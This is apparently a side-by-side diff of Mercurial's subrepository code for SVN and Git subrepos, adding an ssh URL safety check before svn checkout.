1065 ctx = self._repo[opts['rev']]
1065 ctx = self._repo[opts['rev']]
1066 parents = self._repo.dirstate.parents()
1066 parents = self._repo.dirstate.parents()
1067 if opts.get('all'):
1067 if opts.get('all'):
1068 pats = ['set:modified()']
1068 pats = ['set:modified()']
1069 else:
1069 else:
1070 pats = []
1070 pats = []
1071 cmdutil.revert(self.ui, self._repo, ctx, parents, *pats, **opts)
1071 cmdutil.revert(self.ui, self._repo, ctx, parents, *pats, **opts)
1072
1072
1073 def shortid(self, revid):
1073 def shortid(self, revid):
1074 return revid[:12]
1074 return revid[:12]
1075
1075
1076 def verify(self):
1076 def verify(self):
1077 try:
1077 try:
1078 rev = self._state[1]
1078 rev = self._state[1]
1079 ctx = self._repo.unfiltered()[rev]
1079 ctx = self._repo.unfiltered()[rev]
1080 if ctx.hidden():
1080 if ctx.hidden():
1081 # Since hidden revisions aren't pushed/pulled, it seems worth an
1081 # Since hidden revisions aren't pushed/pulled, it seems worth an
1082 # explicit warning.
1082 # explicit warning.
1083 ui = self._repo.ui
1083 ui = self._repo.ui
1084 ui.warn(_("subrepo '%s' is hidden in revision %s\n") %
1084 ui.warn(_("subrepo '%s' is hidden in revision %s\n") %
1085 (self._relpath, node.short(self._ctx.node())))
1085 (self._relpath, node.short(self._ctx.node())))
1086 return 0
1086 return 0
1087 except error.RepoLookupError:
1087 except error.RepoLookupError:
1088 # A missing subrepo revision may be a case of needing to pull it, so
1088 # A missing subrepo revision may be a case of needing to pull it, so
1089 # don't treat this as an error.
1089 # don't treat this as an error.
1090 self._repo.ui.warn(_("subrepo '%s' not found in revision %s\n") %
1090 self._repo.ui.warn(_("subrepo '%s' not found in revision %s\n") %
1091 (self._relpath, node.short(self._ctx.node())))
1091 (self._relpath, node.short(self._ctx.node())))
1092 return 0
1092 return 0
1093
1093
1094 @propertycache
1094 @propertycache
1095 def wvfs(self):
1095 def wvfs(self):
1096 """return own wvfs for efficiency and consistency
1096 """return own wvfs for efficiency and consistency
1097 """
1097 """
1098 return self._repo.wvfs
1098 return self._repo.wvfs
1099
1099
1100 @propertycache
1100 @propertycache
1101 def _relpath(self):
1101 def _relpath(self):
1102 """return path to this subrepository as seen from outermost repository
1102 """return path to this subrepository as seen from outermost repository
1103 """
1103 """
1104 # Keep consistent dir separators by avoiding vfs.join(self._path)
1104 # Keep consistent dir separators by avoiding vfs.join(self._path)
1105 return reporelpath(self._repo)
1105 return reporelpath(self._repo)
1106
1106
1107 class svnsubrepo(abstractsubrepo):
1107 class svnsubrepo(abstractsubrepo):
1108 def __init__(self, ctx, path, state, allowcreate):
1108 def __init__(self, ctx, path, state, allowcreate):
1109 super(svnsubrepo, self).__init__(ctx, path)
1109 super(svnsubrepo, self).__init__(ctx, path)
1110 self._state = state
1110 self._state = state
1111 self._exe = util.findexe('svn')
1111 self._exe = util.findexe('svn')
1112 if not self._exe:
1112 if not self._exe:
1113 raise error.Abort(_("'svn' executable not found for subrepo '%s'")
1113 raise error.Abort(_("'svn' executable not found for subrepo '%s'")
1114 % self._path)
1114 % self._path)
1115
1115
1116 def _svncommand(self, commands, filename='', failok=False):
1116 def _svncommand(self, commands, filename='', failok=False):
1117 cmd = [self._exe]
1117 cmd = [self._exe]
1118 extrakw = {}
1118 extrakw = {}
1119 if not self.ui.interactive():
1119 if not self.ui.interactive():
1120 # Making stdin be a pipe should prevent svn from behaving
1120 # Making stdin be a pipe should prevent svn from behaving
1121 # interactively even if we can't pass --non-interactive.
1121 # interactively even if we can't pass --non-interactive.
1122 extrakw['stdin'] = subprocess.PIPE
1122 extrakw['stdin'] = subprocess.PIPE
1123 # Starting in svn 1.5 --non-interactive is a global flag
1123 # Starting in svn 1.5 --non-interactive is a global flag
1124 # instead of being per-command, but we need to support 1.4 so
1124 # instead of being per-command, but we need to support 1.4 so
1125 # we have to be intelligent about what commands take
1125 # we have to be intelligent about what commands take
1126 # --non-interactive.
1126 # --non-interactive.
1127 if commands[0] in ('update', 'checkout', 'commit'):
1127 if commands[0] in ('update', 'checkout', 'commit'):
1128 cmd.append('--non-interactive')
1128 cmd.append('--non-interactive')
1129 cmd.extend(commands)
1129 cmd.extend(commands)
1130 if filename is not None:
1130 if filename is not None:
1131 path = self.wvfs.reljoin(self._ctx.repo().origroot,
1131 path = self.wvfs.reljoin(self._ctx.repo().origroot,
1132 self._path, filename)
1132 self._path, filename)
1133 cmd.append(path)
1133 cmd.append(path)
1134 env = dict(encoding.environ)
1134 env = dict(encoding.environ)
1135 # Avoid localized output, preserve current locale for everything else.
1135 # Avoid localized output, preserve current locale for everything else.
1136 lc_all = env.get('LC_ALL')
1136 lc_all = env.get('LC_ALL')
1137 if lc_all:
1137 if lc_all:
1138 env['LANG'] = lc_all
1138 env['LANG'] = lc_all
1139 del env['LC_ALL']
1139 del env['LC_ALL']
1140 env['LC_MESSAGES'] = 'C'
1140 env['LC_MESSAGES'] = 'C'
1141 p = subprocess.Popen(cmd, bufsize=-1, close_fds=util.closefds,
1141 p = subprocess.Popen(cmd, bufsize=-1, close_fds=util.closefds,
1142 stdout=subprocess.PIPE, stderr=subprocess.PIPE,
1142 stdout=subprocess.PIPE, stderr=subprocess.PIPE,
1143 universal_newlines=True, env=env, **extrakw)
1143 universal_newlines=True, env=env, **extrakw)
1144 stdout, stderr = p.communicate()
1144 stdout, stderr = p.communicate()
1145 stderr = stderr.strip()
1145 stderr = stderr.strip()
1146 if not failok:
1146 if not failok:
1147 if p.returncode:
1147 if p.returncode:
1148 raise error.Abort(stderr or 'exited with code %d'
1148 raise error.Abort(stderr or 'exited with code %d'
1149 % p.returncode)
1149 % p.returncode)
1150 if stderr:
1150 if stderr:
1151 self.ui.warn(stderr + '\n')
1151 self.ui.warn(stderr + '\n')
1152 return stdout, stderr
1152 return stdout, stderr
1153
1153
1154 @propertycache
1154 @propertycache
1155 def _svnversion(self):
1155 def _svnversion(self):
1156 output, err = self._svncommand(['--version', '--quiet'], filename=None)
1156 output, err = self._svncommand(['--version', '--quiet'], filename=None)
1157 m = re.search(r'^(\d+)\.(\d+)', output)
1157 m = re.search(r'^(\d+)\.(\d+)', output)
1158 if not m:
1158 if not m:
1159 raise error.Abort(_('cannot retrieve svn tool version'))
1159 raise error.Abort(_('cannot retrieve svn tool version'))
1160 return (int(m.group(1)), int(m.group(2)))
1160 return (int(m.group(1)), int(m.group(2)))
1161
1161
1162 def _wcrevs(self):
1162 def _wcrevs(self):
1163 # Get the working directory revision as well as the last
1163 # Get the working directory revision as well as the last
1164 # commit revision so we can compare the subrepo state with
1164 # commit revision so we can compare the subrepo state with
1165 # both. We used to store the working directory one.
1165 # both. We used to store the working directory one.
1166 output, err = self._svncommand(['info', '--xml'])
1166 output, err = self._svncommand(['info', '--xml'])
1167 doc = xml.dom.minidom.parseString(output)
1167 doc = xml.dom.minidom.parseString(output)
1168 entries = doc.getElementsByTagName('entry')
1168 entries = doc.getElementsByTagName('entry')
1169 lastrev, rev = '0', '0'
1169 lastrev, rev = '0', '0'
1170 if entries:
1170 if entries:
1171 rev = str(entries[0].getAttribute('revision')) or '0'
1171 rev = str(entries[0].getAttribute('revision')) or '0'
1172 commits = entries[0].getElementsByTagName('commit')
1172 commits = entries[0].getElementsByTagName('commit')
1173 if commits:
1173 if commits:
1174 lastrev = str(commits[0].getAttribute('revision')) or '0'
1174 lastrev = str(commits[0].getAttribute('revision')) or '0'
1175 return (lastrev, rev)
1175 return (lastrev, rev)
1176
1176
1177 def _wcrev(self):
1177 def _wcrev(self):
1178 return self._wcrevs()[0]
1178 return self._wcrevs()[0]
1179
1179
1180 def _wcchanged(self):
1180 def _wcchanged(self):
1181 """Return (changes, extchanges, missing) where changes is True
1181 """Return (changes, extchanges, missing) where changes is True
1182 if the working directory was changed, extchanges is
1182 if the working directory was changed, extchanges is
1183 True if any of these changes concern an external entry and missing
1183 True if any of these changes concern an external entry and missing
1184 is True if any change is a missing entry.
1184 is True if any change is a missing entry.
1185 """
1185 """
1186 output, err = self._svncommand(['status', '--xml'])
1186 output, err = self._svncommand(['status', '--xml'])
1187 externals, changes, missing = [], [], []
1187 externals, changes, missing = [], [], []
1188 doc = xml.dom.minidom.parseString(output)
1188 doc = xml.dom.minidom.parseString(output)
1189 for e in doc.getElementsByTagName('entry'):
1189 for e in doc.getElementsByTagName('entry'):
1190 s = e.getElementsByTagName('wc-status')
1190 s = e.getElementsByTagName('wc-status')
1191 if not s:
1191 if not s:
1192 continue
1192 continue
1193 item = s[0].getAttribute('item')
1193 item = s[0].getAttribute('item')
1194 props = s[0].getAttribute('props')
1194 props = s[0].getAttribute('props')
1195 path = e.getAttribute('path')
1195 path = e.getAttribute('path')
1196 if item == 'external':
1196 if item == 'external':
1197 externals.append(path)
1197 externals.append(path)
1198 elif item == 'missing':
1198 elif item == 'missing':
1199 missing.append(path)
1199 missing.append(path)
1200 if (item not in ('', 'normal', 'unversioned', 'external')
1200 if (item not in ('', 'normal', 'unversioned', 'external')
1201 or props not in ('', 'none', 'normal')):
1201 or props not in ('', 'none', 'normal')):
1202 changes.append(path)
1202 changes.append(path)
1203 for path in changes:
1203 for path in changes:
1204 for ext in externals:
1204 for ext in externals:
1205 if path == ext or path.startswith(ext + pycompat.ossep):
1205 if path == ext or path.startswith(ext + pycompat.ossep):
1206 return True, True, bool(missing)
1206 return True, True, bool(missing)
1207 return bool(changes), False, bool(missing)
1207 return bool(changes), False, bool(missing)
1208
1208
1209 def dirty(self, ignoreupdate=False, missing=False):
1209 def dirty(self, ignoreupdate=False, missing=False):
1210 wcchanged = self._wcchanged()
1210 wcchanged = self._wcchanged()
1211 changed = wcchanged[0] or (missing and wcchanged[2])
1211 changed = wcchanged[0] or (missing and wcchanged[2])
1212 if not changed:
1212 if not changed:
1213 if self._state[1] in self._wcrevs() or ignoreupdate:
1213 if self._state[1] in self._wcrevs() or ignoreupdate:
1214 return False
1214 return False
1215 return True
1215 return True
1216
1216
1217 def basestate(self):
1217 def basestate(self):
1218 lastrev, rev = self._wcrevs()
1218 lastrev, rev = self._wcrevs()
1219 if lastrev != rev:
1219 if lastrev != rev:
1220 # Last committed rev is not the same than rev. We would
1220 # Last committed rev is not the same than rev. We would
1221 # like to take lastrev but we do not know if the subrepo
1221 # like to take lastrev but we do not know if the subrepo
1222 # URL exists at lastrev. Test it and fallback to rev it
1222 # URL exists at lastrev. Test it and fallback to rev it
1223 # is not there.
1223 # is not there.
1224 try:
1224 try:
1225 self._svncommand(['list', '%s@%s' % (self._state[0], lastrev)])
1225 self._svncommand(['list', '%s@%s' % (self._state[0], lastrev)])
1226 return lastrev
1226 return lastrev
1227 except error.Abort:
1227 except error.Abort:
1228 pass
1228 pass
1229 return rev
1229 return rev
1230
1230
1231 @annotatesubrepoerror
1231 @annotatesubrepoerror
1232 def commit(self, text, user, date):
1232 def commit(self, text, user, date):
1233 # user and date are out of our hands since svn is centralized
1233 # user and date are out of our hands since svn is centralized
1234 changed, extchanged, missing = self._wcchanged()
1234 changed, extchanged, missing = self._wcchanged()
1235 if not changed:
1235 if not changed:
1236 return self.basestate()
1236 return self.basestate()
1237 if extchanged:
1237 if extchanged:
1238 # Do not try to commit externals
1238 # Do not try to commit externals
1239 raise error.Abort(_('cannot commit svn externals'))
1239 raise error.Abort(_('cannot commit svn externals'))
1240 if missing:
1240 if missing:
1241 # svn can commit with missing entries but aborting like hg
1241 # svn can commit with missing entries but aborting like hg
1242 # seems a better approach.
1242 # seems a better approach.
1243 raise error.Abort(_('cannot commit missing svn entries'))
1243 raise error.Abort(_('cannot commit missing svn entries'))
1244 commitinfo, err = self._svncommand(['commit', '-m', text])
1244 commitinfo, err = self._svncommand(['commit', '-m', text])
1245 self.ui.status(commitinfo)
1245 self.ui.status(commitinfo)
1246 newrev = re.search('Committed revision ([0-9]+).', commitinfo)
1246 newrev = re.search('Committed revision ([0-9]+).', commitinfo)
1247 if not newrev:
1247 if not newrev:
1248 if not commitinfo.strip():
1248 if not commitinfo.strip():
1249 # Sometimes, our definition of "changed" differs from
1249 # Sometimes, our definition of "changed" differs from
1250 # svn one. For instance, svn ignores missing files
1250 # svn one. For instance, svn ignores missing files
1251 # when committing. If there are only missing files, no
1251 # when committing. If there are only missing files, no
1252 # commit is made, no output and no error code.
1252 # commit is made, no output and no error code.
1253 raise error.Abort(_('failed to commit svn changes'))
1253 raise error.Abort(_('failed to commit svn changes'))
1254 raise error.Abort(commitinfo.splitlines()[-1])
1254 raise error.Abort(commitinfo.splitlines()[-1])
1255 newrev = newrev.groups()[0]
1255 newrev = newrev.groups()[0]
1256 self.ui.status(self._svncommand(['update', '-r', newrev])[0])
1256 self.ui.status(self._svncommand(['update', '-r', newrev])[0])
1257 return newrev
1257 return newrev
1258
1258
1259 @annotatesubrepoerror
1259 @annotatesubrepoerror
1260 def remove(self):
1260 def remove(self):
1261 if self.dirty():
1261 if self.dirty():
1262 self.ui.warn(_('not removing repo %s because '
1262 self.ui.warn(_('not removing repo %s because '
1263 'it has changes.\n') % self._path)
1263 'it has changes.\n') % self._path)
1264 return
1264 return
1265 self.ui.note(_('removing subrepo %s\n') % self._path)
1265 self.ui.note(_('removing subrepo %s\n') % self._path)
1266
1266
1267 self.wvfs.rmtree(forcibly=True)
1267 self.wvfs.rmtree(forcibly=True)
1268 try:
1268 try:
1269 pwvfs = self._ctx.repo().wvfs
1269 pwvfs = self._ctx.repo().wvfs
1270 pwvfs.removedirs(pwvfs.dirname(self._path))
1270 pwvfs.removedirs(pwvfs.dirname(self._path))
1271 except OSError:
1271 except OSError:
1272 pass
1272 pass
1273
1273
1274 @annotatesubrepoerror
1274 @annotatesubrepoerror
1275 def get(self, state, overwrite=False):
1275 def get(self, state, overwrite=False):
1276 if overwrite:
1276 if overwrite:
1277 self._svncommand(['revert', '--recursive'])
1277 self._svncommand(['revert', '--recursive'])
1278 args = ['checkout']
1278 args = ['checkout']
1279 if self._svnversion >= (1, 5):
1279 if self._svnversion >= (1, 5):
1280 args.append('--force')
1280 args.append('--force')
1281 # The revision must be specified at the end of the URL to properly
1281 # The revision must be specified at the end of the URL to properly
1282 # update to a directory which has since been deleted and recreated.
1282 # update to a directory which has since been deleted and recreated.
1283 args.append('%s@%s' % (state[0], state[1]))
1283 args.append('%s@%s' % (state[0], state[1]))
1284
1285 # SEC: check that the ssh url is safe
1286 util.checksafessh(state[0])
1287
1284 status, err = self._svncommand(args, failok=True)
1288 status, err = self._svncommand(args, failok=True)
1285 _sanitize(self.ui, self.wvfs, '.svn')
1289 _sanitize(self.ui, self.wvfs, '.svn')
1286 if not re.search('Checked out revision [0-9]+.', status):
1290 if not re.search('Checked out revision [0-9]+.', status):
1287 if ('is already a working copy for a different URL' in err
1291 if ('is already a working copy for a different URL' in err
1288 and (self._wcchanged()[:2] == (False, False))):
1292 and (self._wcchanged()[:2] == (False, False))):
1289 # obstructed but clean working copy, so just blow it away.
1293 # obstructed but clean working copy, so just blow it away.
1290 self.remove()
1294 self.remove()
1291 self.get(state, overwrite=False)
1295 self.get(state, overwrite=False)
1292 return
1296 return
1293 raise error.Abort((status or err).splitlines()[-1])
1297 raise error.Abort((status or err).splitlines()[-1])
1294 self.ui.status(status)
1298 self.ui.status(status)
1295
1299
1296 @annotatesubrepoerror
1300 @annotatesubrepoerror
1297 def merge(self, state):
1301 def merge(self, state):
1298 old = self._state[1]
1302 old = self._state[1]
1299 new = state[1]
1303 new = state[1]
1300 wcrev = self._wcrev()
1304 wcrev = self._wcrev()
1301 if new != wcrev:
1305 if new != wcrev:
1302 dirty = old == wcrev or self._wcchanged()[0]
1306 dirty = old == wcrev or self._wcchanged()[0]
1303 if _updateprompt(self.ui, self, dirty, wcrev, new):
1307 if _updateprompt(self.ui, self, dirty, wcrev, new):
1304 self.get(state, False)
1308 self.get(state, False)
1305
1309
1306 def push(self, opts):
1310 def push(self, opts):
1307 # push is a no-op for SVN
1311 # push is a no-op for SVN
1308 return True
1312 return True
1309
1313
1310 @annotatesubrepoerror
1314 @annotatesubrepoerror
1311 def files(self):
1315 def files(self):
1312 output = self._svncommand(['list', '--recursive', '--xml'])[0]
1316 output = self._svncommand(['list', '--recursive', '--xml'])[0]
1313 doc = xml.dom.minidom.parseString(output)
1317 doc = xml.dom.minidom.parseString(output)
1314 paths = []
1318 paths = []
1315 for e in doc.getElementsByTagName('entry'):
1319 for e in doc.getElementsByTagName('entry'):
1316 kind = str(e.getAttribute('kind'))
1320 kind = str(e.getAttribute('kind'))
1317 if kind != 'file':
1321 if kind != 'file':
1318 continue
1322 continue
1319 name = ''.join(c.data for c
1323 name = ''.join(c.data for c
1320 in e.getElementsByTagName('name')[0].childNodes
1324 in e.getElementsByTagName('name')[0].childNodes
1321 if c.nodeType == c.TEXT_NODE)
1325 if c.nodeType == c.TEXT_NODE)
1322 paths.append(name.encode('utf-8'))
1326 paths.append(name.encode('utf-8'))
1323 return paths
1327 return paths
1324
1328
1325 def filedata(self, name, decode):
1329 def filedata(self, name, decode):
1326 return self._svncommand(['cat'], name)[0]
1330 return self._svncommand(['cat'], name)[0]
1327
1331
1328
1332
1329 class gitsubrepo(abstractsubrepo):
1333 class gitsubrepo(abstractsubrepo):
1330 def __init__(self, ctx, path, state, allowcreate):
1334 def __init__(self, ctx, path, state, allowcreate):
1331 super(gitsubrepo, self).__init__(ctx, path)
1335 super(gitsubrepo, self).__init__(ctx, path)
1332 self._state = state
1336 self._state = state
1333 self._abspath = ctx.repo().wjoin(path)
1337 self._abspath = ctx.repo().wjoin(path)
1334 self._subparent = ctx.repo()
1338 self._subparent = ctx.repo()
1335 self._ensuregit()
1339 self._ensuregit()
1336
1340
1337 def _ensuregit(self):
1341 def _ensuregit(self):
1338 try:
1342 try:
1339 self._gitexecutable = 'git'
1343 self._gitexecutable = 'git'
1340 out, err = self._gitnodir(['--version'])
1344 out, err = self._gitnodir(['--version'])
1341 except OSError as e:
1345 except OSError as e:
1342 genericerror = _("error executing git for subrepo '%s': %s")
1346 genericerror = _("error executing git for subrepo '%s': %s")
1343 notfoundhint = _("check git is installed and in your PATH")
1347 notfoundhint = _("check git is installed and in your PATH")
1344 if e.errno != errno.ENOENT:
1348 if e.errno != errno.ENOENT:
1345 raise error.Abort(genericerror % (self._path, e.strerror))
1349 raise error.Abort(genericerror % (self._path, e.strerror))
1346 elif pycompat.osname == 'nt':
1350 elif pycompat.osname == 'nt':
1347 try:
1351 try:
1348 self._gitexecutable = 'git.cmd'
1352 self._gitexecutable = 'git.cmd'
1349 out, err = self._gitnodir(['--version'])
1353 out, err = self._gitnodir(['--version'])
1350 except OSError as e2:
1354 except OSError as e2:
1351 if e2.errno == errno.ENOENT:
1355 if e2.errno == errno.ENOENT:
1352 raise error.Abort(_("couldn't find 'git' or 'git.cmd'"
1356 raise error.Abort(_("couldn't find 'git' or 'git.cmd'"
1353 " for subrepo '%s'") % self._path,
1357 " for subrepo '%s'") % self._path,
1354 hint=notfoundhint)
1358 hint=notfoundhint)
1355 else:
1359 else:
1356 raise error.Abort(genericerror % (self._path,
1360 raise error.Abort(genericerror % (self._path,
1357 e2.strerror))
1361 e2.strerror))
1358 else:
1362 else:
1359 raise error.Abort(_("couldn't find git for subrepo '%s'")
1363 raise error.Abort(_("couldn't find git for subrepo '%s'")
1360 % self._path, hint=notfoundhint)
1364 % self._path, hint=notfoundhint)
1361 versionstatus = self._checkversion(out)
1365 versionstatus = self._checkversion(out)
1362 if versionstatus == 'unknown':
1366 if versionstatus == 'unknown':
1363 self.ui.warn(_('cannot retrieve git version\n'))
1367 self.ui.warn(_('cannot retrieve git version\n'))
1364 elif versionstatus == 'abort':
1368 elif versionstatus == 'abort':
1365 raise error.Abort(_('git subrepo requires at least 1.6.0 or later'))
1369 raise error.Abort(_('git subrepo requires at least 1.6.0 or later'))
1366 elif versionstatus == 'warning':
1370 elif versionstatus == 'warning':
1367 self.ui.warn(_('git subrepo requires at least 1.6.0 or later\n'))
1371 self.ui.warn(_('git subrepo requires at least 1.6.0 or later\n'))
1368
1372
1369 @staticmethod
1373 @staticmethod
1370 def _gitversion(out):
1374 def _gitversion(out):
1371 m = re.search(r'^git version (\d+)\.(\d+)\.(\d+)', out)
1375 m = re.search(r'^git version (\d+)\.(\d+)\.(\d+)', out)
1372 if m:
1376 if m:
1373 return (int(m.group(1)), int(m.group(2)), int(m.group(3)))
1377 return (int(m.group(1)), int(m.group(2)), int(m.group(3)))
1374
1378
1375 m = re.search(r'^git version (\d+)\.(\d+)', out)
1379 m = re.search(r'^git version (\d+)\.(\d+)', out)
1376 if m:
1380 if m:
1377 return (int(m.group(1)), int(m.group(2)), 0)
1381 return (int(m.group(1)), int(m.group(2)), 0)
1378
1382
1379 return -1
1383 return -1
1380
1384
1381 @staticmethod
1385 @staticmethod
1382 def _checkversion(out):
1386 def _checkversion(out):
1383 '''ensure git version is new enough
1387 '''ensure git version is new enough
1384
1388
1385 >>> _checkversion = gitsubrepo._checkversion
1389 >>> _checkversion = gitsubrepo._checkversion
1386 >>> _checkversion('git version 1.6.0')
1390 >>> _checkversion('git version 1.6.0')
1387 'ok'
1391 'ok'
1388 >>> _checkversion('git version 1.8.5')
1392 >>> _checkversion('git version 1.8.5')
1389 'ok'
1393 'ok'
1390 >>> _checkversion('git version 1.4.0')
1394 >>> _checkversion('git version 1.4.0')
1391 'abort'
1395 'abort'
1392 >>> _checkversion('git version 1.5.0')
1396 >>> _checkversion('git version 1.5.0')
1393 'warning'
1397 'warning'
1394 >>> _checkversion('git version 1.9-rc0')
1398 >>> _checkversion('git version 1.9-rc0')
1395 'ok'
1399 'ok'
1396 >>> _checkversion('git version 1.9.0.265.g81cdec2')
1400 >>> _checkversion('git version 1.9.0.265.g81cdec2')
1397 'ok'
1401 'ok'
1398 >>> _checkversion('git version 1.9.0.GIT')
1402 >>> _checkversion('git version 1.9.0.GIT')
1399 'ok'
1403 'ok'
1400 >>> _checkversion('git version 12345')
1404 >>> _checkversion('git version 12345')
1401 'unknown'
1405 'unknown'
1402 >>> _checkversion('no')
1406 >>> _checkversion('no')
1403 'unknown'
1407 'unknown'
1404 '''
1408 '''
1405 version = gitsubrepo._gitversion(out)
1409 version = gitsubrepo._gitversion(out)
1406 # git 1.4.0 can't work at all, but 1.5.X can in at least some cases,
1410 # git 1.4.0 can't work at all, but 1.5.X can in at least some cases,
1407 # despite the docstring comment. For now, error on 1.4.0, warn on
1411 # despite the docstring comment. For now, error on 1.4.0, warn on
1408 # 1.5.0 but attempt to continue.
1412 # 1.5.0 but attempt to continue.
1409 if version == -1:
1413 if version == -1:
1410 return 'unknown'
1414 return 'unknown'
1411 if version < (1, 5, 0):
1415 if version < (1, 5, 0):
1412 return 'abort'
1416 return 'abort'
1413 elif version < (1, 6, 0):
1417 elif version < (1, 6, 0):
1414 return 'warning'
1418 return 'warning'
1415 return 'ok'
1419 return 'ok'
1416
1420
1417 def _gitcommand(self, commands, env=None, stream=False):
1421 def _gitcommand(self, commands, env=None, stream=False):
1418 return self._gitdir(commands, env=env, stream=stream)[0]
1422 return self._gitdir(commands, env=env, stream=stream)[0]
1419
1423
1420 def _gitdir(self, commands, env=None, stream=False):
1424 def _gitdir(self, commands, env=None, stream=False):
1421 return self._gitnodir(commands, env=env, stream=stream,
1425 return self._gitnodir(commands, env=env, stream=stream,
1422 cwd=self._abspath)
1426 cwd=self._abspath)
1423
1427
1424 def _gitnodir(self, commands, env=None, stream=False, cwd=None):
1428 def _gitnodir(self, commands, env=None, stream=False, cwd=None):
1425 """Calls the git command
1429 """Calls the git command
1426
1430
1427 The methods tries to call the git command. versions prior to 1.6.0
1431 The methods tries to call the git command. versions prior to 1.6.0
1428 are not supported and very probably fail.
1432 are not supported and very probably fail.
1429 """
1433 """
1430 self.ui.debug('%s: git %s\n' % (self._relpath, ' '.join(commands)))
1434 self.ui.debug('%s: git %s\n' % (self._relpath, ' '.join(commands)))
1431 if env is None:
1435 if env is None:
1432 env = encoding.environ.copy()
1436 env = encoding.environ.copy()
1433 # disable localization for Git output (issue5176)
1437 # disable localization for Git output (issue5176)
1434 env['LC_ALL'] = 'C'
1438 env['LC_ALL'] = 'C'
1435 # fix for Git CVE-2015-7545
1439 # fix for Git CVE-2015-7545
1436 if 'GIT_ALLOW_PROTOCOL' not in env:
1440 if 'GIT_ALLOW_PROTOCOL' not in env:
1437 env['GIT_ALLOW_PROTOCOL'] = 'file:git:http:https:ssh'
1441 env['GIT_ALLOW_PROTOCOL'] = 'file:git:http:https:ssh'
1438 # unless ui.quiet is set, print git's stderr,
1442 # unless ui.quiet is set, print git's stderr,
1439 # which is mostly progress and useful info
1443 # which is mostly progress and useful info
1440 errpipe = None
1444 errpipe = None
1441 if self.ui.quiet:
1445 if self.ui.quiet:
1442 errpipe = open(os.devnull, 'w')
1446 errpipe = open(os.devnull, 'w')
1443 if self.ui._colormode and len(commands) and commands[0] == "diff":
1447 if self.ui._colormode and len(commands) and commands[0] == "diff":
1444 # insert the argument in the front,
1448 # insert the argument in the front,
1445 # the end of git diff arguments is used for paths
1449 # the end of git diff arguments is used for paths
1446 commands.insert(1, '--color')
1450 commands.insert(1, '--color')
1447 p = subprocess.Popen([self._gitexecutable] + commands, bufsize=-1,
1451 p = subprocess.Popen([self._gitexecutable] + commands, bufsize=-1,
1448 cwd=cwd, env=env, close_fds=util.closefds,
1452 cwd=cwd, env=env, close_fds=util.closefds,
1449 stdout=subprocess.PIPE, stderr=errpipe)
1453 stdout=subprocess.PIPE, stderr=errpipe)
1450 if stream:
1454 if stream:
1451 return p.stdout, None
1455 return p.stdout, None
1452
1456
1453 retdata = p.stdout.read().strip()
1457 retdata = p.stdout.read().strip()
1454 # wait for the child to exit to avoid race condition.
1458 # wait for the child to exit to avoid race condition.
1455 p.wait()
1459 p.wait()
1456
1460
1457 if p.returncode != 0 and p.returncode != 1:
1461 if p.returncode != 0 and p.returncode != 1:
1458 # there are certain error codes that are ok
1462 # there are certain error codes that are ok
1459 command = commands[0]
1463 command = commands[0]
1460 if command in ('cat-file', 'symbolic-ref'):
1464 if command in ('cat-file', 'symbolic-ref'):
1461 return retdata, p.returncode
1465 return retdata, p.returncode
1462 # for all others, abort
1466 # for all others, abort
1463 raise error.Abort(_('git %s error %d in %s') %
1467 raise error.Abort(_('git %s error %d in %s') %
1464 (command, p.returncode, self._relpath))
1468 (command, p.returncode, self._relpath))
1465
1469
1466 return retdata, p.returncode
1470 return retdata, p.returncode
1467
1471
1468 def _gitmissing(self):
1472 def _gitmissing(self):
1469 return not self.wvfs.exists('.git')
1473 return not self.wvfs.exists('.git')
1470
1474
1471 def _gitstate(self):
1475 def _gitstate(self):
1472 return self._gitcommand(['rev-parse', 'HEAD'])
1476 return self._gitcommand(['rev-parse', 'HEAD'])
1473
1477
1474 def _gitcurrentbranch(self):
1478 def _gitcurrentbranch(self):
1475 current, err = self._gitdir(['symbolic-ref', 'HEAD', '--quiet'])
1479 current, err = self._gitdir(['symbolic-ref', 'HEAD', '--quiet'])
1476 if err:
1480 if err:
1477 current = None
1481 current = None
1478 return current
1482 return current
1479
1483
1480 def _gitremote(self, remote):
1484 def _gitremote(self, remote):
1481 out = self._gitcommand(['remote', 'show', '-n', remote])
1485 out = self._gitcommand(['remote', 'show', '-n', remote])
1482 line = out.split('\n')[1]
1486 line = out.split('\n')[1]
1483 i = line.index('URL: ') + len('URL: ')
1487 i = line.index('URL: ') + len('URL: ')
1484 return line[i:]
1488 return line[i:]
1485
1489
1486 def _githavelocally(self, revision):
1490 def _githavelocally(self, revision):
1487 out, code = self._gitdir(['cat-file', '-e', revision])
1491 out, code = self._gitdir(['cat-file', '-e', revision])
1488 return code == 0
1492 return code == 0
1489
1493
1490 def _gitisancestor(self, r1, r2):
1494 def _gitisancestor(self, r1, r2):
1491 base = self._gitcommand(['merge-base', r1, r2])
1495 base = self._gitcommand(['merge-base', r1, r2])
1492 return base == r1
1496 return base == r1
1493
1497
1494 def _gitisbare(self):
1498 def _gitisbare(self):
1495 return self._gitcommand(['config', '--bool', 'core.bare']) == 'true'
1499 return self._gitcommand(['config', '--bool', 'core.bare']) == 'true'
1496
1500
1497 def _gitupdatestat(self):
1501 def _gitupdatestat(self):
1498 """This must be run before git diff-index.
1502 """This must be run before git diff-index.
1499 diff-index only looks at changes to file stat;
1503 diff-index only looks at changes to file stat;
1500 this command looks at file contents and updates the stat."""
1504 this command looks at file contents and updates the stat."""
1501 self._gitcommand(['update-index', '-q', '--refresh'])
1505 self._gitcommand(['update-index', '-q', '--refresh'])
1502
1506
1503 def _gitbranchmap(self):
1507 def _gitbranchmap(self):
1504 '''returns 2 things:
1508 '''returns 2 things:
1505 a map from git branch to revision
1509 a map from git branch to revision
1506 a map from revision to branches'''
1510 a map from revision to branches'''
1507 branch2rev = {}
1511 branch2rev = {}
1508 rev2branch = {}
1512 rev2branch = {}
1509
1513
1510 out = self._gitcommand(['for-each-ref', '--format',
1514 out = self._gitcommand(['for-each-ref', '--format',
1511 '%(objectname) %(refname)'])
1515 '%(objectname) %(refname)'])
1512 for line in out.split('\n'):
1516 for line in out.split('\n'):
1513 revision, ref = line.split(' ')
1517 revision, ref = line.split(' ')
1514 if (not ref.startswith('refs/heads/') and
1518 if (not ref.startswith('refs/heads/') and
1515 not ref.startswith('refs/remotes/')):
1519 not ref.startswith('refs/remotes/')):
1516 continue
1520 continue
1517 if ref.startswith('refs/remotes/') and ref.endswith('/HEAD'):
1521 if ref.startswith('refs/remotes/') and ref.endswith('/HEAD'):
1518 continue # ignore remote/HEAD redirects
1522 continue # ignore remote/HEAD redirects
1519 branch2rev[ref] = revision
1523 branch2rev[ref] = revision
1520 rev2branch.setdefault(revision, []).append(ref)
1524 rev2branch.setdefault(revision, []).append(ref)
1521 return branch2rev, rev2branch
